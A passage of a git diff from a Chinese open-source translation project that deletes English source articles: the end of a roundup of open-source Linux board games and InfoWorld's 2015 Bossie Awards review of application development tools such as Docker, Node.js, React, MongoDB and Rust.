- - Dice rolls are done by a dedicated dice server that is independent of TripleA
- - All dice rolls are PGP Verified and email to every player
- - Every move and every dice roll is logged and saved in TripleA's History Window
- - An online game can be later continued under PBEM mode
- - Hard for others to cheat
-- Hosted online lobby
-- Utilities for editing maps
-- Website: [triplea.sourceforge.net][1]
-- Developer: Sean Bridges (original developer), Mark Christopher Duncan
-- License: GNU GPL v2
-- Version Number: 1.8.0.7
-
-----------
-
-### Domination ###
-
-![Domination in action](http://www.linuxlinks.com/portal/content/reviews/Games2/Screenshot-Domination.png)
-
-Domination is an open source game that shares common themes with the hugely popular Risk board game. It has many game options and includes many maps.
-
-In the classic “World Domination” game of military strategy, you are battling to conquer the world. To win, you must launch daring attacks, defend yourself to all fronts, and sweep across vast continents with boldness and cunning. But remember, the dangers, as well as the rewards, are high. Just when the world is within your grasp, your opponent might strike and take it all away!
-
-Features include:
-
-- Simple to learn
- - Domination - you must occupy all countries on the map, and thereby eliminate all opponents. These can be long, drawn out games
- - Capital - each player has a country they have selected as a Capital. To win the game, you must occupy all Capitals
- - Mission - each player draws a random mission. The first to complete their mission wins. Missions may include the elimination of a certain colour, occupation of a particular continent, or a mix of both
-- Map editor
-- Simple map format
-- Multiplayer network play
-- Single player
-- Hotseat
-- 5 user interfaces
-- Game types:
-- Play online
-- Website: [domination.sourceforge.net][2]
-- Developer: Yura Mamyrin, Christian Weiske, Mike Chaten, and many others
-- License: GNU GPL v3
-- Version Number: 1.1.1.5
-
-----------
-
-### PyChess ###
-
-![Micro-Max in action](http://www.linuxlinks.com/portal/content/reviews/Games/Screenshot-Pychess.jpg)
-
-PyChess is a Gnome inspired chess client written in Python.
-
-The goal of PyChess, is to provide a fully featured, nice looking, easy to use chess client for the gnome-desktop.
-
-The client should be usable both to those totally new to chess, those who want to play an occasional game, and those who wants to use the computer to further enhance their play.
-
-Features include:
-
-- Attractive interface
-- Chess Engine Communication Protocol (CECP) and Univeral Chess Interface (UCI) Engine support
-- Free online play on the Free Internet Chess Server (FICS)
-- Read and writes PGN, EPD and FEN chess file formats
-- Built-in Python based engine
-- Undo and pause functions
-- Board and piece animation
-- Drag and drop
-- Tabbed interface
-- Hints and spyarrows
-- Opening book sidepanel using sqlite
-- Score plot sidepanel
-- "Enter game" in pgn dialog
-- Optional sounds
-- Legal move highlighting
-- Internationalised or figure pieces in notation
-- Website: [www.pychess.org][3]
-- Developer: Thomas Dybdahl Ahle
-- License: GNU GPL v2
-- Version Number: 0.12 Anderssen rc4
-
-----------
-
-### Scrabble ###
-
-![Scrabble in action](http://www.linuxlinks.com/portal/content/reviews/Games2/Screenshot-Scrabble3D.png)
-
-Scrabble3D is a highly customizable Scrabble game that not only supports Classic Scrabble and Superscrabble but also 3D games and own boards. You can play local against the computer or connect to a game server to find other players.
-
-Scrabble is a board game with the goal to place letters crossword like. Up to four players take part and get a limited amount of letters (usually 7 or 8). Consecutively, each player tries to compose his letters to one or more word combining with the placed words on the game array. The value of the move depends on the letters (rare letter get more points) and bonus fields which multiply the value of a letter or the whole word. The player with most points win.
-
-This idea is extended with Scrabble3D to the third dimension. Of course, a classic game with 15x15 fields or Superscrabble with 21x21 fields can be played and you may configure any field setting by yourself. The game can be played by the provided freeware program against Computer, other local players or via internet. Last but not least it's possible to connect to a game server to find other players and to obtain a rating. Most options are configurable, including the number and valuation of letters, the used dictionary, the language of dialogs and certainly colors, fonts etc.
-
-Features include:
-
-- Configurable board, letterset and design
-- Board in OpenGL graphics with user-definable wavefront model
-- Game against computer with support of multithreading
-- Post-hoc game analysis with calculation of best move by computer
-- Match with other players connected on a game server
-- NSA rating and highscore at game server
-- Time limit of games
-- Localization; use of non-standard digraphs like CH, RR, LL and right to left reading
-- Multilanguage help / wiki
-- Network games are buffered and asynchronous games are possible
-- Running games can be kibitzed
-- International rules including italian "Cambio Secco"
-- Challenge mode, What-if-variant, CLABBERS, etc
-- Website: [sourceforge.net/projects/scrabble][4]
-- Developer: Heiko Tietze
-- License: GNU GPL v3
-- Version Number: 3.1.3
-
-----------
-
-### Backgammon ###
-
-![Backgammon in action](http://www.linuxlinks.com/portal/content/reviews/Games/Screenshot-gnubg.png)
-
-GNU Backgammon (gnubg) is a strong backgammon program (world-class with a bearoff database installed) usable either as an engine by other programs or as a standalone backgammon game. It is able to play and analyze both money games and tournament matches, evaluate and roll out positions, and more.
-
-In addition to supporting simple play, it also has extensive analysis features, a tutor mode, adjustable difficulty, and support for exporting annotated games.
-
-It currently plays at about the level of a championship flight tournament player and is gradually improving.
-
-gnubg can be played on numerous on-line backgammon servers, such as the First Internet Backgammon Server (FIBS).
-
-Features include:
-
-- A command line interface (with full command editing features if GNU readline is available) that lets you play matches and sessions against GNU Backgammon with a rough ASCII representation of the board on text terminals
-- Support for a GTK+ interface with a graphical board window. Both 2D and 3D graphics are available
-- Tournament match and money session cube handling and cubeful play
-- Support for both 1-sided and 2-sided bearoff databases: 1-sided bearoff database for 15 checkers on the first 6 points and optional 2-sided database kept in memory. Optional larger 1-sided and 2-sided databases stored on disk
-- Automated rollouts of positions, with lookahead and race variance reduction where appropriate. Rollouts may be extended
-- Functions to generate legal moves and evaluate positions at varying search depths
-- Neural net functions for giving cubeless evaluations of all other contact and race positions
-- Automatic and manual annotation (analysis and commentary) of games and matches
-- Record keeping of statistics of players in games and matches (both native inside GNU Backgammon and externally using relational databases and Python)
-- Loading and saving analyzed games and matches as .sgf files (Smart Game Format)
-- Exporting positions, games and matches to: (.eps) Encapsulated Postscript, (.gam) Jellyfish Game, (.html) HTML, (.mat) Jellyfish Match, (.pdf) PDF, (.png) Portable Network Graphics, (.pos) Jellyfish Position, (.ps) PostScript, (.sgf) Gnu Backgammon File, (.tex) LaTeX, (.txt) Plain Text, (.txt) Snowie Text
-- Import of matches and positions from a number of file formats: (.bkg) Hans Berliner's BKG Format, (.gam) GammonEmpire Game, (.gam) PartyGammon Game, (.mat) Jellyfish Match, (.pos) Jellyfish Position, (.sgf) Gnu Backgammon File, (.sgg) GamesGrid Save Game, (.tmg) TrueMoneyGames, (.txt) Snowie Text
-- Python Scripting
-- Native language support; 10 languages complete or in progress
-- Website: [www.gnubg.org][5]
-- Developer: Joseph Heled, Oystein Johansen, Jonathan Kinsey, David Montgomery, Jim Segrave, Joern Thyssen, Gary Wong and contributors
-- License: GPL v2
-- Version Number: 1.05.000
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxlinks.com/article/20150830011533893/BoardGames.html
-
-作者:Frazer Kline
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]:http://triplea.sourceforge.net/
-[2]:http://domination.sourceforge.net/
-[3]:http://www.pychess.org/
-[4]:http://sourceforge.net/projects/scrabble/
-[5]:http://www.gnubg.org/
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source application development tools.md b/sources/share/20151028 Bossie Awards 2015--The best open source application development tools.md
deleted file mode 100644
index c135ae0832..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source application development tools.md
+++ /dev/null
@@ -1,338 +0,0 @@
-GHLandy Translating
-
-Bossie Awards 2015: The best open source application development tools
-================================================================================
-InfoWorld's top picks among platforms, frameworks, databases, and all the other tools that programmers use
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-app-dev-100613767-orig.jpg)
-
-### The best open source development tools ###
-
-There must be a better way, right? The developers are the ones who find it. This year's winning projects in the application development category include client-side frameworks, server-side frameworks, mobile frameworks, databases, languages, libraries, editors, and yeah, Docker. These are our top picks among all of the tools that make it faster and easier to build better applications.
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-docker-100613773-orig.jpg)
-
-### Docker ###
-
-The darling of container fans almost everywhere, [Docker][2] provides a low-overhead way to isolate an application or service’s environment, which serves its stated goal of being an open platform for building, shipping, and running distributed applications. Docker has been widely supported, even among those seeking to replace the Docker container format with an alternative, more secure runtime and format, specifically Rkt and AppC. Heck, Microsoft Visual Studio now supports deploying into a Docker container too.
-
-Docker’s biggest impact has been on virtual machine environments. Since Docker containers run inside the operating system, many more Docker containers than virtual machines can run in a given amount of RAM. This is important because RAM is usually the scarcest and most expensive resource in a virtualized environment.
-
-There are hundreds of thousands of runnable public images on Docker Hub, of which a few hundred are official, and the rest are from the community. You describe Docker images with a Dockerfile and build images locally from the Docker command line. You can add both public and private image repositories to Docker Hub.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-nodejs-iojs-100613778-orig.jpg)
-
-### Node.js and io.js ###
-
-[Node.js][2] -- and its recently reunited fork [io.js][3] -- is a platform built on [Google Chrome's V8 JavaScript runtime][4] for building fast, scalable, network applications. Node uses an event-driven, nonblocking I/O model without threads. In general, Node tends to take less memory and CPU resources than other runtime engines, such as Java and the .Net Framework. For example, a typical Node.js Web server can run well in a 512MB instance on Cloud Foundry or a 512MB Docker container.
-
-The Node repository on GitHub has more than 35,000 stars and more than 8,000 forks. The project, sponsored primarily by Joyent, has more than 600 contributors. Some of the more famous Node applications are 37Signals, [Ancestry.com][5], Chomp, the Wall Street Journal online, FeedHenry, [GE.com][6], Mockingbird, [Pearson.com][7], Shutterstock, and Uber. The popular IoT back-end Node-RED is built on Node, as are many client apps, such as Brackets and Nuclide.
-
--- Martin Heller
-
-![](rticle/2015/09/bossies-2015-angularjs-100613766-orig.jpg)
-
-### AngularJS ###
-
-[AngularJS][8] (or simply Angular, among friends) is a Model-View-Whatever (MVW) JavaScript AJAX framework that extends HTML with markup for dynamic views and data binding. Angular is especially good for developing single-page Web applications and linking HTML forms to models and JavaScript controllers.
-
-The weird sounding Model-View-Whatever pattern is an attempt to include the Model-View-Controller, Model-View-ViewModel, and Model-View-Presenter patterns under one moniker. The differences among these three closely related patterns are the sorts of topics that programmers love to argue about fiercely; the Angular developers decided to opt out of the discussion.
-
-Basically, Angular automatically synchronizes data from your UI (view) with your JavaScript objects (model) through two-way data binding. To help you structure your application better and make it easy to test, AngularJS teaches the browser how to do dependency injection and inversion of control.
-
-Angular was created by Google and open-sourced under the MIT license; there are currently more than 1,200 contributors to the project on GitHub, and the repository has more than 40,000 stars and 18,000 forks. The Angular site lists [210 “neat things” built with Angular][9].
-
--- Martin Heller
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-react-100613782-orig.jpg)
-
-### React ###
-
-[React][10] is a JavaScript library for building a UI or view, typically for single-page applications. Note that React does not implement anything having to do with a model or controller. React pages can render on the server or the client; rendering on the server (with Node.js) is typically much faster. People often combine React with AngularJS to create complete applications.
-
-React combines JavaScript and HTML in a single file, optionally a JSX component. React fans like the way JSX components combine views and their related functionality in one file, though that flies in the face of the last decade of Web development trends, which were all about separating the markup and the code. React fans also claim that you can’t understand it until you’ve tried it. Perhaps you should; the React repository on GitHub has 26,000 stars.
-
-[React Native][11] implements React with native iOS controls; the React Native command line uses Node and Xcode. [ReactJS.Net][12] integrates React with [ASP.Net][13] and C#. React is available under a BSD license with a patent license grant from Facebook.
-
--- Martin Heller
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-atom-100613768-orig.jpg)
-
-### Atom ###
-
-[Atom][14] is an open source, hackable desktop editor from GitHub, based on Web technologies. It’s a full-featured tool with a fuzzy finder; fast projectwide search and replace; multiple cursors and selections; multiple panes, snippets, code folding; and the ability to import TextMate grammars and themes. Out of the box, Atom displayed proper syntax highlighting for every programming language on which I tried it, except for F# and C#; I fixed that easily by loading those packages from within Atom. Not surprising, Atom has tight integration with GitHub.
-
-The skeleton of Atom has been separated from the guts and called the Electron shell, providing an open source way to build cross-platform desktop apps with Web technologies. Visual Studio Code is built on the Electron shell, as are a number of proprietary and open source apps, including Slack and Kitematic. Facebook Nuclide adds significant functionality to Atom, including remote development and support for Flow, Hack, and Mercurial.
-
-On the downside, updating Atom packages can become painful, especially if you have many of them installed. The Nuclide packages seem to be the worst offenders -- they not only take a long time to update, they run CPU-intensive Node processes to do so.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-brackets-100613769-orig.jpg)
-
-### Brackets ###
-
-[Brackets][15] is a lightweight editor for Web design that Adobe developed and open-sourced, drawing heavily on other open source projects. The idea is to build better tooling for JavaScript, HTML, CSS, and related open Web technologies. Brackets itself is written in JavaScript, HTML, and CSS, and the developers use Brackets to build Brackets. The editor portion is based on another open source project, CodeMirror, and the Brackets native shell is based on Google’s Chromium Embedded Framework.
-
-Brackets features a clean UI, with the ability to open a quick inline editor that displays all of the related CSS for some HTML, or all of the related JavaScript for some scripting, and a live preview for Web pages that you are editing. New in Brackets 1.4 is instant search in files, easier preferences editing, the ability to enable and disable extensions individually, improved text rendering on Macs, and Greek and Cyrillic character support. Last November, Adobe started shipping a preview version of Extract for Brackets, which can pull out design information from Photoshop files, as part of the default download for Brackets.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-typescript-100613786-orig.jpg)
-
-### TypeScript ###
-
-[TypeScript][16] is a portable, duck-typed superset of JavaScript that compiles to plain JavaScript. The goal of the project is to make JavaScript usable for large applications. In pursuit of that goal, TypeScript adds optional types, classes, and modules to JavaScript, and it supports tools for large-scale JavaScript applications. Typing gets rid of some of the nonsensical and potentially buggy default behavior in JavaScript, for example:
-
- > 1 + "1"
- '11'
-
-“Duck” typing means that the type checking focuses on the shape of the data values; TypeScript describes basic types, interfaces, and classes. While the current version of JavaScript does not support traditional, class-based, object-oriented programming, the ECMAScript 6 specification does. TypeScript compiles ES6 classes into plain, compatible JavaScript, with prototype-based objects, unless you enable ES6 output using the `--target` compiler option.
-
-Visual Studio includes TypeScript in the box, starting with Visual Studio 2013 Update 2. You can also edit TypeScript in Visual Studio Code, WebStorm, Atom, Sublime Text, and Eclipse.
-
-When using an external JavaScript library, or new host API, you'll need to use a declaration file (.d.ts) to describe the shape of the library. You can often find declaration files in the [DefinitelyTyped][17] repository, either by browsing, using the [TSD definition manager][18], or using NuGet.
-
-TypeScript’s GitHub repository has more than 6,000 stars.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-swagger-100613785-orig.jpg)
-
-### Swagger ###
-
-[Swagger][19] is a language-agnostic interface to RESTful APIs, with tooling that gives you interactive documentation, client SDK generation, and discoverability. It’s one of several recent attempts to codify the description of RESTful APIs, in the spirit of WSDL for XML Web Services (2000) and CORBA for distributed object interfaces (1991).
-
-The tooling makes Swagger especially interesting. [Swagger-UI][20] automatically generates beautiful documentation and a live API sandbox from a Swagger-compliant API. The [Swagger codegen][21] project allows generation of client libraries automatically from a Swagger-compliant server.
-
-[Swagger Editor][22] lets you edit Swagger API specifications in YAML inside your browser and preview documentations in real time. Valid Swagger JSON descriptions can then be generated and used with the full Swagger tooling.
-
-The [Swagger JS][23] library is a fast way to enable a JavaScript client to communicate with a Swagger-enabled server. Additional clients exist for Clojure, Go, Java, .Net, Node.js, Perl, PHP, Python, Ruby, and Scala.
-
-The [Amazon API Gateway][24] is a managed service for API management at scale. It can import Swagger specifications using an open source [Swagger Importer][25] tool.
-
-Swagger and friends use the Apache 2.0 license.
-
--- Martin Heller
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-polymer-100613781-orig.jpg)
-
-### Polymer ###
-
-The [Polymer][26] library is a lightweight, “sugaring” layer on top of the Web components APIs to help in building your own Web components. It adds several features for greater ease in building complex elements, such as creating custom element registration, adding markup to your element, configuring properties on your element, setting the properties with attributes, data binding with mustache syntax, and internal styling of elements.
-
-Polymer also includes libraries of prebuilt elements. The Iron library includes elements for working with layout, user input, selection, and scaffolding apps. The Paper elements implement Google's Material Design. The Gold library includes elements for credit card input fields for e-commerce, the Neon elements implement animations, the Platinum library implements push messages and offline caching, and the Google Web Components library is exactly what it says; it includes wrappers for YouTube, Firebase, Google Docs, Hangouts, Google Maps, and Google Charts.
-
-Polymer Molecules are elements that wrap other JavaScript libraries. The only Molecule currently implemented is for marked, a Markdown library. The Polymer repository on GitHub currently has 12,000 stars. The software is distributed under a BSD-style license.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-ionic-100613775-orig.jpg)
-
-### Ionic ###
-
-The [Ionic][27] framework is a front-end SDK for building hybrid mobile apps, using Angular.js and Cordova, PhoneGap, or Trigger.io. Ionic was designed to be similar in spirit to the Android and iOS SDKs, and to do a minimum of DOM manipulation and use hardware-accelerated transitions to keep the rendering speed high. Ionic is focused mainly on the look and feel and UI interaction of your app.
-
-In addition to the framework, Ionic encompasses an ecosystem of mobile development tools and resources. These include Chrome-based tools, Angular extensions for Cordova capabilities, back-end services, a development server, and a shell View App to enable testers to use your Ionic code on their devices without the need for you to distribute beta apps through the App Store or Google Play.
-
-Appery.io integrated Ionic into its low-code builder in July 2015. Ionic’s GitHub repository has more than 18,000 stars and more than 3,000 forks. Ionic is distributed under an MIT license and currently runs in UIWebView for iOS 7 and later, and in Android 4.1 and up.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-cordova-100613771-orig.jpg)
-
-### Cordova ###
-
-[Apache Cordova][28] is the open source project spun off when Adobe acquired PhoneGap from Nitobi. Cordova is a set of device APIs, plus some tooling, that allows a mobile app developer to access native device functionality like the camera and accelerometer from JavaScript. When combined with a UI framework like Angular, it allows a smartphone app to be developed with only HTML, CSS, and JavaScript. By using Cordova plug-ins for multiple devices, you can generate hybrid apps that share a large portion of their code but also have access to a wide range of platform capabilities. The HTML5 markup and code runs in a WebView hosted by the Cordova shell.
-
-Cordova is one of the cross-platform mobile app options supported by Visual Studio 2015. Several companies offer online builders for Cordova apps, similar to the Adobe PhoneGap Build service. Online builders save you from having to install and maintain most of the device SDKs on which Cordova relies.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-famous-100613774-orig.jpg)
-
-### Famous Engine ###
-
-The high-performance Famo.us JavaScript framework introduced last year has become the [Famous Engine][29] and [Famous Framework][30]. The Famous Engine runs in a mixed mode, with the DOM and WebGL under a single coordinate system. As before, Famous structures applications in a scene graph hierarchy, but now it produces very little garbage (reducing the garbage collector overhead) and sustains 60FPS animations.
-
-The Famous Physics engine has been refactored to its own, fine-grained module so that you can load only the features you need. Other improvements since last year include streamlined eventing, improved sizing, decoupling the scene graph from the rendering pipeline by using a draw command buffer, and switching to a fully open MIT license.
-
-The new Famous Framework is an alpha-stage developer preview built on the Famous Engine; its goal is creating reusable, composable, and interchangeable UI widgets and applications. Eventually, Famous hopes to replace the jQuery UI widgets with Famous Framework widgets, but while it's promising, the Famous Framework is nowhere near production-ready.
-
--- Martin Heller
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-mongodb-rev-100614248-orig.jpg)
-
-### MongoDB ###
-
-[MongoDB][31] is no stranger to the Bossies or to the ever-growing and ever-competitive NoSQL market. If you still aren't familiar with this very popular technology, here's a brief overview: MongoDB is a cross-platform document-oriented database, favoring JSON-like documents with dynamic schemas that make data integration easier and faster.
-
-MongoDB has attractive features, including but not limited to ad hoc queries, flexible indexing, replication, high availability, automatic sharding, load balancing, and aggregation.
-
-The big, bold move with [version 3.0 this year][32] was the new WiredTiger storage engine. We can now have document-level locking. This makes “normal” applications a whole lot more scalable and makes MongoDB available to more use cases.
-
-MongoDB has a growing open source ecosystem with such offerings as the [TokuMX engine][33], from the famous MySQL bad boys Percona. The long list of MongoDB customers includes heavy hitters such as Craigslist, eBay, Facebook, Foursquare, Viacom, and the New York Times.
-
--- Andrew Oliver
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-couchbase-100614851-orig.jpg)
-
-### Couchbase ###
-
-[Couchbase][34] is another distributed, document-oriented database that has been making waves in the NoSQL world for quite some time now. Couchbase and MongoDB often compete, but they each have their sweet spots. Couchbase tends to outperform MongoDB when doing more in memory is possible.
-
-Additionally, Couchbase’s mobile features allow you to disconnect and ship a database in compact format. This allows you to scale down as well as up. This is useful not just for mobile devices but also for specialized applications, like shipping medical records across radio waves in Africa.
-
-This year Couchbase added N1QL, a SQL-based query language that did away with Couchbase’s biggest obstacle, requiring static views. The new release also introduced multidimensional scaling. This allows individual scaling of services such as querying, indexing, and data storage to improve performance, instead of adding an entire, duplicate node.
-
--- Andrew C. Oliver
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-cassandra-100614852-orig.jpg)
-
-### Cassandra ###
-
-[Cassandra][35] is the other white meat of column family databases. HBase might be included with your favorite Hadoop distribution, but Cassandra is the one people deliberately deploy for specialized applications. There are good reasons for this.
-
-Cassandra was designed for high workloads of both writes and reads where millisecond consistency isn't as important as throughput. HBase is optimized for reads and greater write consistency. To a large degree, Cassandra tends to be used for operational systems and HBase more for data warehouse and batch-system-type use cases.
-
-While Cassandra has not received as much attention as other NoSQL databases and slipped into a quiet period a couple years back, it is widely used and deployed, and it's a great fit for time series, product catalog, recommendations, and other applications. If you want to keep a cluster up “no matter what” with multiple masters and multiple data centers, and you need to scale with lots of reads and lots of writes, Cassandra might just be your Huckleberry.
-
--- Andrew C. Oliver
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-orientdb-100613780-orig.jpg)
-
-### OrientDB ###
-
-[OrientDB][36] is an interesting hybrid in the NoSQL world, combining features from a document database, where individual documents can have multiple fields without necessarily defining a schema, and a graph database, which consists of a set of nodes and edges. At a basic level, OrientDB considers the document as a vertex, and relationships between fields as graph edges. Because the relationships between elements are part of the record, no costly joins are required when querying data.
-
-Like most databases today, OrientDB offers linear scalability via a distributed architecture. Adding capacity is a matter of simply adding more nodes to the cluster. Queries are written in a variant of SQL that is extended to support graph concepts. It's not exactly SQL, but data analysts shouldn't have too much trouble adapting. Language bindings are available for most commonly used languages, such as R, Scala, .Net, and C, and those integrating OrientDB into their applications will find an active user community to get help from.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-rethinkdb-100613783-orig.jpg)
-
-### RethinkDB ###
-
-[RethinkDB][37] is a scalable, real-time JSON database with the ability to continuously push updated query results to applications that subscribe to changes. There are official RethinkDB drivers for Ruby, Python, and JavaScript/Node.js, and community-supported drivers for more than a dozen other languages, including C#, Go, and PHP.
-
-It’s temping to confuse RethinkDB with real-time sync APIs, such as Firebase and PubNub. RethinkDB can be run as a cloud service like Firebase and PubNub, but you can also install it on your own hardware or Docker containers. RethinkDB does more than synchronize: You can run arbitrary RethinkDB queries, including table joins, subqueries, geospatial queries, and aggregation. Finally, RethinkDB is designed to be accessed from an application server, not a browser.
-
-Where MongoDB requires you to poll the database to see changes, RethinkDB lets you subscribe to a stream of changes to a query result. You can shard and scale RethinkDB easily, unlike MongoDB. Also unlike relational databases, RethinkDB does not give you full ACID support or strong schema enforcement, although it can perform joins.
-
-The RethinkDB repository has 10,000 stars on GitHub, a remarkably high number for a database. It is licensed with the Affero GPL 3.0; the drivers are licensed with Apache 2.0.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-rust-100613784-orig.jpg)
-
-### Rust ###
-
-[Rust][38] is a syntactically C-like systems programming language from Mozilla Research that guarantees memory safety and offers painless concurrency (that is, no data races). It does not have a garbage collector and has minimal runtime overhead. Rust is strongly typed with type inference. This is all promising.
-
-Rust was designed for performance. It doesn’t yet demonstrate great performance, however, so now the mantra seems to be that it runs as fast as C++ code that implements all the safety checks built into Rust. I’m not sure whether I believe that, as in many cases the strictest safety checks for C/C++ code are done by static and dynamic analysis and testing, which don’t add any runtime overhead. Perhaps Rust performance will come with time.
-
-So far, the only tools for Rust are the Cargo package manager and the rustdoc documentation generator, plus a couple of simple Rust plug-ins for programming editors. As far as we have heard, there is no shipping software that was actually built with Rust. Now that Rust has reached the 1.0 milestone, we might expect that to change.
-
-Rust is distributed with a dual Apache 2.0 and MIT license. With 13,000 stars on its GitHub repository, Rust is certainly attracting attention, but when and how it will deliver real benefits remains to be seen.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-opencv-100613779-orig.jpg)
-
-### OpenCV ###
-
-[OpenCV][39] (Open Source Computer Vision Library) is a computer vision and machine learning library that contains about 500 algorithms, such as face detection, moving object tracking, image stitching, red-eye removal, machine learning, and eye movement tracking. It runs on Windows, Mac OS X, Linux, Android, and iOS.
-
-OpenCV has official C++, C, Python, Java, and MATLAB interfaces, and wrappers in other languages such as C#, Perl, and Ruby. CUDA and OpenCL interfaces are under active development. OpenCV was originally (1999) an Intel Research project in Russia; from there it moved to the robotics research lab Willow Garage (2008) and finally to [OpenCV.org][39] (2012) with a core team at Itseez, current source on GitHub, and stable snapshots on SourceForge.
-
-Users of OpenCV include Google, Yahoo, Microsoft, Intel, IBM, Sony, Honda, and Toyota. There are currently more than 6,000 stars and 5,000 forks on the GitHub repository. The project uses a BSD license.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-llvm-100613777-orig.jpg)
-
-### LLVM ###
-
-The [LLVM Project][40] is a collection of modular and reusable compiler and tool chain technologies, which originated at the University of Illinois. LLVM has grown to include a number of subprojects, several of which are interesting in their own right. LLVM is distributed with Debian, Ubuntu, and Apple Xcode, among others, and it’s used in commercial products from the likes of Adobe (including After Effects), Apple (including Objective-C and Swift), Cray, Intel, NVIDIA, and Siemens. A few of the open source projects that depend on LLVM are PyPy, Mono, Rubinius, Pure, Emscripten, Rust, and Julia. Microsoft has recently contributed LLILC, a new LLVM-based compiler for .Net, to the .Net Foundation.
-
-The main LLVM subprojects are the core libraries, which provide optimization and code generation; Clang, a C/C++/Objective-C compiler that’s about three times faster than GCC; LLDB, a much faster debugger than GDB; libc++, an implementation of the C++ 11 Standard Library; and OpenMP, for parallel programming.
-
--- Martin Heller
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-main-100613823-orig.jpg)
-
-### Read about more open source winners ###
-
-InfoWorld's Best of Open Source Awards for 2014 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][41]
-
-[Bossie Awards 2015: The best open source application development tools][42]
-
-[Bossie Awards 2015: The best open source big data tools][43]
-
-[Bossie Awards 2015: The best open source data center and cloud software][44]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][45]
-
-[Bossie Awards 2015: The best open source networking and security software][46]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982920/open-source-tools/bossie-awards-2015-the-best-open-source-application-development-tools.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:https://www.docker.com/
-[2]:https://nodejs.org/en/
-[3]:https://iojs.org/en/
-[4]:https://developers.google.com/v8/?hl=en
-[5]:http://www.ancestry.com/
-[6]:http://www.ge.com/
-[7]:https://www.pearson.com/
-[8]:https://angularjs.org/
-[9]:https://builtwith.angularjs.org/
-[10]:https://facebook.github.io/react/
-[11]:https://facebook.github.io/react-native/
-[12]:http://reactjs.net/
-[13]:http://asp.net/
-[14]:https://atom.io/
-[15]:http://brackets.io/
-[16]:http://www.typescriptlang.org/
-[17]:http://definitelytyped.org/
-[18]:http://definitelytyped.org/tsd/
-[19]:http://swagger.io/
-[20]:https://github.com/swagger-api/swagger-ui
-[21]:https://github.com/swagger-api/swagger-codegen
-[22]:https://github.com/swagger-api/swagger-editor
-[23]:https://github.com/swagger-api/swagger-js
-[24]:http://aws.amazon.com/cn/api-gateway/
-[25]:https://github.com/awslabs/aws-apigateway-importer
-[26]:https://www.polymer-project.org/
-[27]:http://ionicframework.com/
-[28]:https://cordova.apache.org/
-[29]:http://famous.org/
-[30]:http://famous.org/framework/
-[31]:https://www.mongodb.org/
-[32]:http://www.infoworld.com/article/2878738/nosql/first-look-mongodb-30-for-mature-audiences.html
-[33]:http://www.infoworld.com/article/2929772/nosql/mongodb-crossroads-growth-or-openness.html
-[34]:http://www.couchbase.com/nosql-databases/couchbase-server
-[35]:https://cassandra.apache.org/
-[36]:http://orientdb.com/
-[37]:http://rethinkdb.com/
-[38]:https://www.rust-lang.org/
-[39]:http://opencv.org/
-[40]:http://llvm.org/
-[41]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[42]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[43]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[44]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[45]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[46]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source applications.md b/sources/share/20151028 Bossie Awards 2015--The best open source applications.md
deleted file mode 100644
index 29fced5cc9..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source applications.md
+++ /dev/null
@@ -1,238 +0,0 @@
-Bossie Awards 2015: The best open source applications
-================================================================================
-InfoWorld's top picks in open source business applications, enterprise integration, and middleware
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-applications-100614669-orig.jpg)
-
-### The best open source applications ###
-
